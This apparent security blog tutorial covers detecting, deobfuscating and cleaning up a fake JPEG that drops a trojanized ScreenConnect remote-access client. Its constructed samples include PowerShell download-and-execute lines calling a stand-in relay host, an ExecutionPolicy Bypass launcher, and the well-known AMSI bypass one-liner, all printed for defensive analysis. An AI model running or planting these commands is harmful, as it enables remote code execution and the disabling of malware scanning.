
Introduction:
A seemingly harmless JPEG file named “sysupdate.jpeg” is being used as a delivery vehicle for a trojanized version of ConnectWise ScreenConnect, a legitimate remote access tool. This attack chain – starting with an obfuscated PowerShell script hidden inside image metadata – bypasses traditional signature-based defenses and grants attackers persistent control, credential theft capabilities, and full surveillance over compromised Windows systems.
Learning Objectives:
- Analyze how a weaponized JPEG file executes a multi-stage PowerShell payload to deploy trojanized ScreenConnect.
- Detect and block obfuscated PowerShell attacks using AMSI, logging, and endpoint detection rules.
- Implement mitigation strategies against image-based malware and unauthorized remote access tools in enterprise environments.
You Should Know:
1. How a JPEG File Becomes an Executable Payload
The attack begins with a file named `sysupdate.jpeg` that contains no valid JPEG image data at all: it is a text file holding an obfuscated PowerShell script. Double‑clicking a `.jpeg` does not run PowerShell (Windows hands the file to the default image viewer, which simply fails to render it), so the script needs a launcher, typically a shortcut, a script inside an accompanying archive, or an initial dropper that reads the file's contents and passes them to PowerShell. The image extension exists to slip past mail filters and casual inspection, not to trigger execution.
Step‑by‑step breakdown of the infection chain:
- Delivery – The JPEG arrives as an email attachment or via a malicious download. Its icon mimics a standard image.
- Execution trigger – Social engineering (e.g., "Open to view this invoice") or a script in a ZIP file hands the image to PowerShell. Note that `powershell.exe -ExecutionPolicy Bypass -File sysupdate.jpeg` does not work as written: `-File` refuses any file that does not carry a `.ps1` extension. A launcher therefore reads the file and pipes its contents to Invoke-Expression instead, for example `powershell.exe -ExecutionPolicy Bypass -Command "IEX (Get-Content sysupdate.jpeg -Raw)"`.
- PowerShell extraction – The script reads its own byte stream, decodes a Base64‑embedded second stage, and loads it into memory.
- Trojanized ScreenConnect – The payload downloads a repackaged ScreenConnect client from a C2 server, configured to automatically connect to an attacker‑controlled relay.
- Persistence – Scheduled tasks or registry run keys ensure the trojanized ScreenConnect survives reboots.
Commands to analyze suspicious image files on Windows (PowerShell):
Check whether the file contains plaintext PowerShell keywords (findstr treats each space‑separated word as its own search term):
findstr /i "powershell invoke-expression iex frombase64string" sysupdate.jpeg
Extract long Base64‑looking runs from the file:
Get-Content sysupdate.jpeg -Raw | Select-String -Pattern '[A-Za-z0-9+/=]{40,}' -AllMatches | ForEach-Object { $_.Matches.Value }
View the file header: a valid JPEG starts with FF D8 FF. The -Count parameter exists in PowerShell 7; on Windows PowerShell 5.1 use `Format-Hex sysupdate.jpeg | Select-Object -First 1` instead:
Format-Hex sysupdate.jpeg -Count 16
Linux commands to examine similar files:
Check the file type (a fake reports "data" or "ASCII text" instead of "JPEG image data"):
file sysupdate.jpeg
Extract strings and look for Base64 or PowerShell indicators:
strings sysupdate.jpeg | grep -Ei "powershell|iex|invoke|frombase64string"
View the hex header:
xxd sysupdate.jpeg | head -n 5
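The checks above can be folded into one triage routine. The following is an added example for this section, not code from the original post: it verifies the JPEG magic, walks the marker segments up to Start‑Of‑Scan, reports any bytes appended after the End‑Of‑Image marker (a common hiding place), and hunts for PowerShell keywords both in plain text and inside Base64 runs, decoding those as UTF‑16LE (the encoding `-EncodedCommand` uses) or UTF‑8. The three sample files, the keyword list and the second‑stage string are constructed here and are not artefacts from the campaign.

```python
"""Triage a file that claims to be a JPEG: does it parse as one, and does it
carry PowerShell in plain text, inside a Base64 run, or after the image?
Added example for this section, not code from the original post.  The three
sample files below are constructed and are not artefacts from the campaign."""
import base64
import re

SOI, EOI, SOS_MARKER = b"\xff\xd8", b"\xff\xd9", 0xDA
# Assumed keyword list; extend it with the indicators your own cases show.
KEYWORDS = ("powershell", "invoke-expression", "iex", "frombase64string",
            "-executionpolicy", "-encodedcommand", "downloadstring")
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def walk_segments(data: bytes) -> dict:
    """Walk the marker segments up to Start-Of-Scan, then locate the EOI.
    Anything after the EOI is not image data and is a classic hiding spot."""
    if not data.startswith(SOI + b"\xff"):
        return {"valid_header": False, "segments": [], "eoi_found": False, "trailing": 0}
    segments, pos = [], 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == SOS_MARKER:            # entropy-coded data follows; stop walking
            break
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        segments.append(marker)
        pos += 2 + length
    eoi = data.find(EOI, pos)
    trailing = len(data) - (eoi + 2) if eoi != -1 else 0
    return {"valid_header": True, "segments": segments,
            "eoi_found": eoi != -1, "trailing": trailing}


def keyword_hits(blob: bytes) -> list:
    low = blob.lower()
    return sorted(k for k in KEYWORDS if k.encode() in low)


def decode_base64_run(run: bytes) -> list:
    """Decode a Base64 run as UTF-16LE (what -EncodedCommand uses) when the
    odd bytes are mostly NUL, and as UTF-8 otherwise."""
    try:
        raw = base64.b64decode(run + b"=" * (-len(run) % 4), validate=True)
    except ValueError:                      # binascii.Error is a ValueError
        return []
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return [raw.decode("utf-16-le", errors="replace")]
    return [raw.decode("utf-8", errors="replace")]


def triage(data: bytes) -> dict:
    """Security-relevant findings for one file."""
    info = walk_segments(data)
    plain = keyword_hits(data)
    hidden = set()
    for run in B64_RUN.findall(data):
        for text in decode_base64_run(run):
            hidden.update(keyword_hits(text.encode("utf-8", "replace")))
    return {
        "valid_jpeg": info["valid_header"] and info["eoi_found"],
        "segments": [hex(m) for m in info["segments"]],
        "bytes_after_eoi": info["trailing"],
        "plaintext_indicators": plain,
        "base64_indicators": sorted(hidden),
        "suspicious": bool(plain or hidden or info["trailing"]),
    }


# --- constructed samples (not campaign artefacts) ------------------------------
STAGE2 = 'IEX((New-Object Net.WebClient).DownloadString("http://relay.example/sc.ps1"))'
PAYLOAD_B64 = base64.b64encode(STAGE2.encode("utf-16-le")).decode()


def _segment(marker: int, body: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + (len(body) + 2).to_bytes(2, "big") + body


# (a) the page's scenario: a ".jpeg" that is really a PowerShell launcher
FAKE_JPEG = ("$p='" + PAYLOAD_B64 + "'; powershell -ExecutionPolicy Bypass "
             "-EncodedCommand $p").encode()
# (b) a structurally valid JPEG with the payload in a COM segment and a
#     second stage appended after the EOI marker
COM_JPEG = (SOI + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
            + _segment(0xFE, PAYLOAD_B64.encode())
            + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x00" * 16 + EOI
            + b"MZ-appended-dropper")
# (c) a clean minimal JPEG for comparison
CLEAN_JPEG = SOI + _segment(0xE0, b"JFIF\x00") + b"\xff\xda\x00\x02" + b"\x00" * 8 + EOI

if __name__ == "__main__":
    for name, blob in (("fake", FAKE_JPEG), ("com", COM_JPEG), ("clean", CLEAN_JPEG)):
        print(name, triage(blob))
```

The `bytes_after_eoi` count is the check the YARA rule below cannot express on its own: a file can be a perfectly valid image and still carry a dropper after the `FF D9`.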
2. Deobfuscating the Hidden PowerShell Script
Attackers heavily obfuscate PowerShell to evade static detection and human analysis. Common techniques include:
– Base64 encoding of the real script.
– String reversal, compression (GZip/Deflate), and XOR ciphers.
– Use of `IEX` (Invoke-Expression) to execute decoded content.
Manual deobfuscation steps (Windows PowerShell):
1. Extract the obfuscated string from the JPEG (pick your own variable name: `$matches` is an automatic variable that the -match operator overwrites):
$raw = Get-Content sysupdate.jpeg -Raw
$pattern = '([A-Za-z0-9+/=]{100,})'
$found = [regex]::Matches($raw, $pattern)
$b64string = $found[0].Value
2. Decode from Base64. If the output shows a NUL between every character, the payload is UTF‑16LE (the encoding PowerShell's -EncodedCommand uses); decode with `[System.Text.Encoding]::Unicode` instead of UTF8:
$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64string))
Write-Host $decoded
- Replace obfuscated aliases (e.g., `iex` → Invoke-Expression) and evaluate the script one stage at a time, for instance by swapping `IEX` for `Write-Host` so each stage prints its decoded input instead of executing it.
Decoding an -EncodedCommand payload (Windows PowerShell 5.1 and PowerShell 7 alike; there is no -DecodeCommand parameter, the decode is plain .NET):
The value is Base64 over UTF‑16LE, so the Unicode encoding is the right one here; UTF8 would print a NUL after every character.
$encoded = "SQBFAFgAKAAiAEgAZQBsAGwAbwAiACkA"
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
This decodes to IEX("Hello"): the encoded command simply passes the string "Hello" to Invoke-Expression.
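The manual steps above repeat for every layer, and real samples stack several: Base64 around a GZip stream, a reversed string, a byte array XORed with a one‑byte key. The following is an added example for this section, not code from the original post: a loop that recognises one layer at a time, unwraps it, and stops when nothing else matches, the same "replace IEX and look again" procedure done programmatically. The regexes are assumptions about how each layer usually looks (tune them for other obfuscators), the UTF‑16LE sniff is the same one needed for `-EncodedCommand`, and the layered sample is built here from a harmless inner command so the loop can be checked end to end.

```python
"""Peel the obfuscation layers this section lists (Base64, GZip, string
reversal, XOR) one at a time until a readable script remains.  Added example
for the deobfuscation steps above, not code from the original post.  The
regexes are assumptions about each layer's usual shape; the sample is built
here from a harmless inner command."""
import base64
import gzip
import re

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENC = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
# a long quoted literal that is later handed to [array]::Reverse(
REV = re.compile(r"['\"]([^'\"]{16,})['\"][\s\S]*?\[array\]::Reverse\(")
# a hex byte array followed by "-bxor <key>"
XOR = re.compile(r"\(((?:0x[0-9a-f]{1,2}\s*,\s*)+0x[0-9a-f]{1,2})\)[\s\S]*?-bxor\s*(\d+)", re.I)


def bytes_to_text(raw: bytes) -> str:
    """-EncodedCommand and most dropped blobs are UTF-16LE; a UTF-8 decode of
    them shows a NUL after every character, so sniff the odd bytes first."""
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def peel_once(script: str):
    """Undo one layer; return (layer_name, inner_script) or None if none match."""
    m = ENC.search(script) or B64.search(script)
    if m:
        raw = base64.b64decode(m.group(1))
        if raw[:2] == b"\x1f\x8b":                     # Base64 around a GZip stream
            return "base64+gzip", gzip.decompress(raw).decode("utf-8", "replace")
        return "base64", bytes_to_text(raw)
    m = REV.search(script)
    if m:
        return "reverse", m.group(1)[::-1]
    m = XOR.search(script)
    if m:
        key = int(m.group(2))
        data = bytes(int(x, 16) ^ key for x in re.split(r"\s*,\s*", m.group(1)))
        return "xor", data.decode("utf-8", "replace")
    return None


def deobfuscate(script: str, max_layers: int = 10):
    """Return (final_script, [names of the layers peeled, outermost first])."""
    layers = []
    for _ in range(max_layers):
        step = peel_once(script)
        if step is None:
            break
        layers.append(step[0])
        script = step[1]
    return script, layers


# --- constructed sample ---------------------------------------------------------
INNER = 'IEX((New-Object Net.WebClient).DownloadString("http://relay.example/sc.exe"))'


def build_sample(inner: str, key: int = 90) -> str:
    """XOR -> reverse -> GZip+Base64, mimicking the layering described above."""
    xor_layer = ("$b=[byte[]](" + ",".join(f"0x{b ^ key:02x}" for b in inner.encode())
                 + ");$s=-join($b|%{[char]($_ -bxor " + str(key) + ")});IEX $s")
    rev_layer = ("$r='" + xor_layer[::-1] + "';$c=$r.ToCharArray();"
                 "[array]::Reverse($c);IEX(-join $c)")
    blob = base64.b64encode(gzip.compress(rev_layer.encode())).decode()
    return ("IEX([IO.StreamReader]::new([IO.Compression.GzipStream]::new("
            "[IO.MemoryStream]::new([Convert]::FromBase64String('" + blob + "')),"
            "[IO.Compression.CompressionMode]::Decompress)).ReadToEnd())")


if __name__ == "__main__":
    final, layers = deobfuscate(build_sample(INNER))
    print(layers, "->", final)
```

Each pass removes exactly one wrapper and never executes anything, which is the property that makes it safe to run on a sample; the `max_layers` bound stops a crafted script from looping the analyst.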
YARA rule to detect weaponized JPEGs. Note that YARA's uint16() reads little‑endian, so the FF D8 magic must be matched with uint16be(0) == 0xFFD8 (or uint16(0) == 0xD8FF):
rule Weaponized_JPEG_PowerShell {
    meta:
        description = "Detects JPEG files containing PowerShell execution strings"
        author = "Undercode"
    strings:
        $ps1 = /powershell.*-executionpolicy/i
        $ps2 = /iex\s*\(.*frombase64string/i
        $ps3 = "Invoke-Expression" nocase ascii wide
    condition:
        uint16be(0) == 0xFFD8 and any of ($ps*)
}
Caveat: the sample described in section 1 is not a real JPEG at all, so the header check would exclude it. Keep the magic test for payloads hidden inside a genuine image, and run a second rule without it (scoped by file extension in your scanner) for scripts that are merely renamed to .jpeg.
3. Detecting Trojanized ScreenConnect Activity
Legitimate ScreenConnect (sold for a time as ConnectWise Control) runs as `ScreenConnect.ClientService.exe` or ScreenConnect.WindowsClient.exe. The trojanized version often uses:
– Different file hashes, unsigned binaries, or mismatched digital signatures.
– Unusual command‑line arguments connecting to rogue domains.
– Persistent calls to attacker‑controlled C2 (e.g., hxxp://malicious-relay[.]com).
Windows commands to identify suspicious instances:
List ScreenConnect processes with full command line (the wildcard matters: -like without one is a plain equality test and matches nothing here):
Get-CimInstance Win32_Process | Where-Object { $_.Name -like "ScreenConnect*" } | Select-Object ProcessId, ParentProcessId, CommandLine
Check the signature of every ScreenConnect binary on disk (the client installs into a per‑instance folder, so search rather than guess the path):
Get-ChildItem "$env:ProgramFiles*\ScreenConnect*" -Recurse -Include *.exe,*.dll | Get-AuthenticodeSignature | Where-Object { $_.Status -ne "Valid" }
A valid signature is not proof of innocence: a client built on the attacker's own ScreenConnect server still carries ConnectWise's signature, so treat the relay host in the command line as the primary indicator and compare it with the relay your own instance uses.
List connections on the default relay port (8041):
netstat -ano | findstr ":8041"
Attackers can, and often do, put the relay on 443 instead, so correlate by process rather than by port:
Get-NetTCPConnection -State Established | Where-Object { (Get-Process -Id $_.OwningProcess).Name -like "ScreenConnect*" }
Event Log hunting (PowerShell):
Look for ScreenConnect service install events (wildcards are required; -like "ScreenConnect" alone is an exact match):
Get-WinEvent -FilterHashtable @{LogName='System'; ID=7045} | Where-Object { $_.Message -like "*ScreenConnect*" }
Detect PowerShell script blocks that reference ScreenConnect (event 4104 is only written when Script Block Logging is enabled; see section 6):
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object { $_.Message -like "*ScreenConnect*" }
Confirm the parent with Security event 4688 (command‑line auditing on) or Sysmon event 1: a ScreenConnect client whose parent is powershell.exe is the parent‑child relationship this campaign produces.
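The section above gives three signals that matter more than a file hash: who launched the client, which relay it was told to contact, and whether the binary is signed. The following is an added example for this section, not code from the original post, that applies those checks to process‑creation records as a SIEM rule would. Assumptions, labelled: records carry Sysmon event 1 style fields (Image, CommandLine, ParentImage) plus a `Signer` field filled from a separate Authenticode lookup; the client receives its relay as `h=<host>&p=<port>` query parameters on its command line (verify this against your own deployment); the allowlist, the signer name and the three records are constructed here.

```python
"""Hunt process-creation records for a ScreenConnect client that a script
host launched or that talks to a relay outside the allowlist.  Added example
for this section, not code from the original post.  Assumptions: Sysmon
Event 1 style fields plus a 'Signer' field from an Authenticode lookup, and
a relay passed as h=<host>&p=<port> on the command line.  Records below are
constructed, not real telemetry."""
import re
from urllib.parse import parse_qs

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
EXPECTED_SIGNER = "ConnectWise"                    # assumed signer substring
ALLOWED_RELAYS = {"support.corp.example"}          # relays your own instance uses


def relay_from_cmdline(cmdline: str):
    """Return (host, port) from the '?e=...&h=...&p=...' client argument."""
    m = re.search(r'\?([^"\s]+)', cmdline)
    if not m:
        return None, None
    q = parse_qs(m.group(1))
    return q.get("h", [None])[0], q.get("p", [None])[0]


def assess(event: dict, allowed_relays=ALLOWED_RELAYS) -> list:
    """Return the reasons this event is suspicious; an empty list is benign."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if not image.startswith("screenconnect"):
        return []
    reasons = []
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in SCRIPT_HOSTS:
        reasons.append(f"launched by script host {parent}")
    host, port = relay_from_cmdline(event.get("CommandLine", ""))
    if host is None:
        reasons.append("no relay host in command line")
    elif host.lower() not in allowed_relays:
        reasons.append(f"relay {host}:{port} not in allowlist")
    if EXPECTED_SIGNER.lower() not in event.get("Signer", "").lower():
        reasons.append(f"binary not signed by {EXPECTED_SIGNER}")
    if "\\program files" not in event["Image"].lower():   # the real client installs under Program Files
        reasons.append("unexpected install path")
    return reasons


def hunt(events, allowed_relays=ALLOWED_RELAYS) -> list:
    """Return [(image, reasons)] for every flagged record."""
    flagged = []
    for ev in events:
        reasons = assess(ev, allowed_relays)
        if reasons:
            flagged.append((ev["Image"], reasons))
    return flagged


# --- constructed records (Sysmon Event 1 shape, not real telemetry) --------------
LEGIT_EXE = r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3d4)\ScreenConnect.ClientService.exe"
ROGUE_EXE = r"C:\Users\jdoe\AppData\Local\Temp\ScreenConnect.ClientService.exe"
EVENTS = [
    {"Image": LEGIT_EXE,
     "CommandLine": f'"{LEGIT_EXE}" "?e=Access&y=Guest&h=support.corp.example&p=8041&k=k3y"',
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Signer": "ConnectWise, LLC"},
    {"Image": ROGUE_EXE,
     "CommandLine": f'"{ROGUE_EXE}" "?e=Access&y=Guest&h=malicious-relay.com&p=443&k=k3y"',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Signer": "ConnectWise, LLC"},   # a repackaged client keeps the vendor signature
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "Signer": "Microsoft Windows"},
]

if __name__ == "__main__":
    for image, reasons in hunt(EVENTS):
        print(image, "->", "; ".join(reasons))
```

The rogue record is validly signed and still fires on three counts (script‑host parent, unknown relay, user‑writable path), which is the point the section makes: the relay allowlist, not the signature, separates your ScreenConnect from the attacker's.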
4. Blocking the Attack Chain with AMSI and AppLocker
Antimalware Scan Interface (AMSI) lets the registered antimalware engine (Microsoft Defender by default) inspect script content at the moment PowerShell is about to run it, after every Base64, GZip or XOR layer has been unwrapped, so obfuscation does not hide the payload from it. AMSI is built into PowerShell 5.0 and later and has no switch of its own; what you configure is the engine behind it and the logging around it:
Keep Defender's script scanning and PUA protection on (Set-MpPreference has no -DisableObfuscatedScriptsDetection parameter):
Set-MpPreference -DisableScriptScanning $false
Set-MpPreference -PUAProtection Enabled
Turn on Script Block Logging so the deobfuscated script is written to event 4104 (the registry command is in section 6).
Verify AMSI is active with Microsoft's AMSI test string, the AMSI counterpart of the EICAR file; Defender should refuse the line with "This script contains malicious content and has been blocked":
'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
The widely circulated `[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)` one‑liner also "tests" AMSI (it errors when AMSI works), but it is the classic AMSI bypass: Defender blocks the string itself and any EDR will alert on it, so do not run it on production hosts.
AppLocker publisher rule so that only ConnectWise‑signed ScreenConnect binaries run. New-AppLockerPolicy has no -Action or -Path parameters; the supported flow is to derive publisher rules from a known‑good install, review the generated XML, then apply it. Once an Exe rule set is enforced AppLocker denies everything it does not allow, so no explicit Deny rule is needed:
Get-AppLockerFileInformation -Directory "C:\Program Files (x86)\ScreenConnect Client (<your instance id>)" -Recurse | New-AppLockerPolicy -RuleType Publisher -User Everyone -Optimize -Xml | Out-File .\screenconnect-policy.xml
Set-AppLockerPolicy -XmlPolicy .\screenconnect-policy.xml -Merge
Caveat: a client generated on the attacker's own ScreenConnect server carries the same ConnectWise signature, so a publisher rule alone does not stop it. Pair it with an egress allowlist for your relay host, and use the rule to keep unsigned or re‑signed copies out.
Alternative using Windows Defender ASR rules:
Add-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 -AttackSurfaceReductionRules_Actions Enabled
This rule ("Block executable content from email client and webmail") stops executable and script files (.exe, .dll, .scr, .ps1, .vbs, .js) launched from mail clients. It does not look inside a .jpeg, so what it catches is the launcher script, not the image; add D3E037E1-3EB8-44C8-A917-57927947596D ("Block JavaScript or VBScript from launching downloaded executable content") for the case where the launcher is a script inside a downloaded ZIP.
5. Extracting and Analyzing the Trojanized Remote Access Tool
Once the trojanized ScreenConnect is installed, it typically registers as a service. To reverse engineer the binary:
Linux static analysis workflow (the binary is a Windows PE, so do not point ELF tools at it):
Obtain the binary on the Windows host first: copy it from disk, or dump the running process with Sysinternals `procdump -ma ScreenConnect.ClientService.exe` there (procdump is a Windows tool; running it under Wine does not give you the Windows process's memory).
Analyze strings. ScreenConnect is a .NET application, so its string literals are stored as UTF‑16LE; run strings twice, once with -el, or a plain run misses the relay URL:
strings -n 8 ScreenConnect.ClientService.exe | grep -Ei "http|socket|connect|credential"
strings -n 8 -el ScreenConnect.ClientService.exe | grep -Ei "http|socket|connect|credential"
Show the PE headers and imports (readelf only understands ELF; binutils objdump handles PE):
objdump -p ScreenConnect.ClientService.exe
Check for packers using Detect It Easy (diec):
diec ScreenConnect.ClientService.exe
Windows static analysis with free tools (run from an elevated Command Prompt):
:: Use PEStudio to find anomalies
"C:\Tools\pestudio\pestudio.exe" "C:\Program Files\ScreenConnect\ScreenConnect.ClientService.exe"
:: Extract network indicators using Sysinternals strings (it scans ASCII and Unicode strings by default)
strings64.exe -n 8 "C:\Program Files\ScreenConnect\ScreenConnect.ClientService.exe" | findstr /i "http:// https:// .onion :8041"
Dynamic analysis in a sandbox (PowerShell snippet for logging; Start-Transcript records only the console session, so run Procmon or Sysmon alongside it to capture file and registry changes):
Start-Transcript -Path "$env:temp\screenconnect_trace.log"
$proc = Start-Process -FilePath "C:\Program Files\ScreenConnect\ScreenConnect.ClientService.exe" -PassThru -NoNewWindow
# Wait 30 seconds, then capture the connections owned by that process
Start-Sleep -Seconds 30
Get-NetTCPConnection -OwningProcess $proc.Id | Select-Object RemoteAddress, RemotePort, State
Stop-Transcript
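The `-el` point above is easy to verify in code. The following is an added example for this section, not code from the original post: a small string extractor that scans a binary for both ASCII and UTF‑16LE runs and then filters them for network indicators (URLs, `.onion` names, `host:port` pairs), tagging each hit with the encoding it was found in so the analyst can see what a plain `strings` run would have missed. The sample blob is constructed here and is not a real client binary; the indicator regex is an assumption to be extended for your own cases.

```python
"""Pull ASCII and UTF-16LE strings out of a binary and keep the network
indicators.  Added example for the static-analysis step above, not code
from the original post.  GNU strings sees only ASCII unless given -el, and
.NET assemblies such as the ScreenConnect client store their literals as
UTF-16LE.  The sample blob is constructed here, not a real client binary."""
import re

INDICATOR = re.compile(
    r"https?://[^\s\"']+"                 # URLs
    r"|[a-z0-9.-]+\.onion"                # Tor hidden services
    r"|[a-z0-9.-]+\.[a-z]{2,}:\d{2,5}",   # host:port pairs such as relay:8041
    re.I)


def extract_strings(data: bytes, min_len: int = 8) -> list:
    """Return [(encoding, offset, text)] for printable runs of >= min_len
    characters in both encodings, ordered by file offset."""
    found = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        found.append(("ascii", m.start(), m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        found.append(("utf-16le", m.start(), m.group().decode("utf-16-le")))
    return sorted(found, key=lambda t: t[1])


def network_indicators(data: bytes) -> list:
    """[(encoding, offset, indicator)]; the encoding column shows which hits
    an ASCII-only `strings` run would have missed."""
    hits = []
    for enc, off, text in extract_strings(data):
        for ind in INDICATOR.findall(text):
            hits.append((enc, off, ind))
    return hits


# --- constructed sample blob (not a real PE) -------------------------------------
SAMPLE = (b"MZ" + b"\x90" * 14
          + b"This program cannot be run in DOS mode." + b"\x00" * 4
          + "https://malicious-relay.com:8041/".encode("utf-16-le") + b"\x00\x00"
          + bytes(range(0, 32)) * 2
          + b"ScreenConnect.ClientService" + b"\x00"
          + b"relay.example.onion" + b"\x00")

if __name__ == "__main__":
    for enc, off, ind in network_indicators(SAMPLE):
        print(f"{off:#06x} {enc:8} {ind}")
```

On the sample the relay URL surfaces only from the UTF‑16LE pass, exactly the hit that `strings` without `-el` drops; run both passes on any .NET binary before concluding it holds no indicators.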
6. Hardening Endpoints Against Image‑Based Malware
Prevention is superior to detection. Apply these controls:
Disable PowerShell execution from non‑standard file extensions (Windows):
Make sure .jpeg and .jpg are associated with an image handler and not with a script host (these are the defaults; re‑apply them if the association has been tampered with):
cmd /c assoc .jpeg=jpegfile
cmd /c assoc .jpg=jpegfile
Record every script block PowerShell executes, whatever file it was read from (this is logging, not blocking; the policy key may need to be created first):
New-Item -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
To actually prevent scripts from running out of user‑writable locations such as Downloads, use AppLocker or WDAC script rules or PowerShell Constrained Language Mode; Script Block Logging on its own stops nothing.
Configure Windows Defender to scan inside archives and mail stores and turn on Network Protection (the fake JPEG itself is an ordinary file that real‑time scanning already covers; the Disable* parameters are Boolean):
Set-MpPreference -DisableArchiveScanning $false
Set-MpPreference -DisableEmailScanning $false
Set-MpPreference -AllowNetworkProtectionOnWinServer $true
Set-MpPreference -EnableNetworkProtection Enabled
Use Sysmon to log process creation and the PowerShell engine being loaded outside powershell.exe:
<!-- Install Sysmon, then use this config snippet. schemaversion is mandatory and must match your Sysmon release; `sysmon64 -s` prints the supported schema. -->
<Sysmon schemaversion="4.90">
  <EventFiltering>
    <!-- Event 1: any process whose command line references a .jpeg (PowerShell reading the image is the trigger) -->
    <ProcessCreate onmatch="include">
      <CommandLine condition="contains">.jpeg</CommandLine>
    </ProcessCreate>
    <!-- Event 7: the PowerShell engine DLL loaded by something other than powershell.exe.
         powershell.exe itself is a process image, not a loaded DLL, so an ImageLoad
         rule on it never fires; System.Management.Automation is what to watch for. -->
    <RuleGroup name="unmanaged-powershell" groupRelation="and">
      <ImageLoad onmatch="include">
        <ImageLoaded condition="contains">System.Management.Automation</ImageLoaded>
        <Image condition="excludes">powershell.exe</Image>
      </ImageLoad>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
Apply with: `sysmon64.exe -accepteula -i sysmon_config.xml`
7. Incident Response: Removing the Infection
If a system is already compromised:
Step 1 – Stop the client service and kill ScreenConnect processes that are not validly signed (the wildcards are required; `-like "ScreenConnect"` on its own is an exact match and selects nothing):
Get-Service "ScreenConnect Client*" | Stop-Service -Force
Get-Process | Where-Object { $_.Path -like "*ScreenConnect*" -and (Get-AuthenticodeSignature $_.Path).Status -ne "Valid" } | Stop-Process -Force
A signed but attacker‑built client passes this filter, so also stop any instance whose command line points at a relay you do not own (section 3 shows how to read it).
Step 2 – Preserve, then delete the weaponized JPEG and downloaded payloads. Hash and copy the sample and the client folder to evidence storage before removal; -Recurse applies to the directory only (substitute the real user profile for <victim>):
Get-FileHash "C:\Users\<victim>\Downloads\sysupdate.jpeg"
Remove-Item -Path "C:\Users\<victim>\Downloads\sysupdate.jpeg" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "C:\ProgramData\ScreenConnect\" -Force -Recurse
Step 3 – Remove persistence:
Delete scheduled tasks
Get-ScheduledTask | Where-Object {$_.TaskName -like "*ScreenConnect*"} | Unregister-ScheduledTask -Confirm:$false
Remove registry run keys
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ScreenConnect" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ScreenConnect" -ErrorAction SilentlyContinue
Step 4 – Reset credentials and rotate tokens:
Force a password reset for affected domain users (run from a DC). Setting one shared plaintext password on every account, as a quick one‑liner tends to do, replaces one compromise with another; generate a unique value per account and require a change at next logon. Start with the accounts that logged on to the compromised host plus every privileged account, and widen to `-Filter *` only if the scope of compromise is unknown:
Get-ADUser -Filter * | ForEach-Object {
    $pw = -join ((33..126) | Get-Random -Count 20 | ForEach-Object { [char]$_ })
    Set-ADAccountPassword -Identity $_.SamAccountName -Reset -NewPassword (ConvertTo-SecureString -AsPlainText $pw -Force)
    Set-ADUser -Identity $_.SamAccountName -ChangePasswordAtLogon $true
}
Purge Kerberos tickets on the host. This clears only the current logon session's ticket cache; tickets the attacker already holds stay valid until the krbtgt password is reset (twice, with a replication interval between), which is the step that actually invalidates them:
klist purge
What Undercode Say:
- Image files are not safe by extension – A JPEG header means nothing; any file can embed executable code. Always scan with content‑aware tools, not just extension or MIME type.
- Trojanized remote access tools are the new backdoor – Attackers abuse signed but repackaged software like ScreenConnect to bypass firewalls and blend into enterprise traffic. Application whitelisting and certificate pinning are essential.
Analysis: This attack highlights a shift toward “living‑off‑the‑land” techniques where legitimate executables become the malware. The use of ScreenConnect – a tool trusted by many IT teams – makes detection extremely difficult because outbound connections to remote support servers appear normal. Defenders must combine AMSI, process command‑line auditing, and behavioral rules that flag unusual parent‑child relationships (e.g., PowerShell spawning ScreenConnect). Additionally, educating users that image files can be malicious is critical; no interactive preview should ever require script execution.
Prediction:
